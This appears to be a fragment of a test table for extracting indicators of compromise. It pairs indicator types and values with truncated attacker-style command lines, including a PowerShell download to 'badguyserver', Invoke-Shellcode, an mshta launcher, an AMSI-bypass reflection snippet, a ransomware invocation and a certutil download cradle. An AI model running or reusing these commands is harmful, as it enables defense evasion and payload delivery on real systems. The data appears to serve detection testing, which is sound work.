14 | dns | badguyserver | 47 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
15 | dns | Invoke-Shellcode.ps | 48 | .\powershell Invoke-Shellcode.ps1 |
16 | dns | Invoke-ReverseDnsLookup.ps | 49 | .\powershell Invoke-ReverseDnsLookup.ps1 |
17 | dns | Wscript.Shell | 67 | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... |
18 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
19 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 77 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
20 | ipv4 | 1.2.3.4 | 78 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
21 | dns | wscript.shell | 81 | cmd /c "powershell wscript.shell used to download a .gif" |
22 | dns | abc.com | 90 | c:\Diagnostics\UserTmp\ransomware.exe @ abc.com abc.wallet |
23 | ipv4 | 127.0.0.1 | 102 | certutil -urlcache -split -f http://127.0.0.1/ |
24 | url | http://127.0.0.1/ | 102 | certutil -urlcache -split -f http://127.0.0.1/ |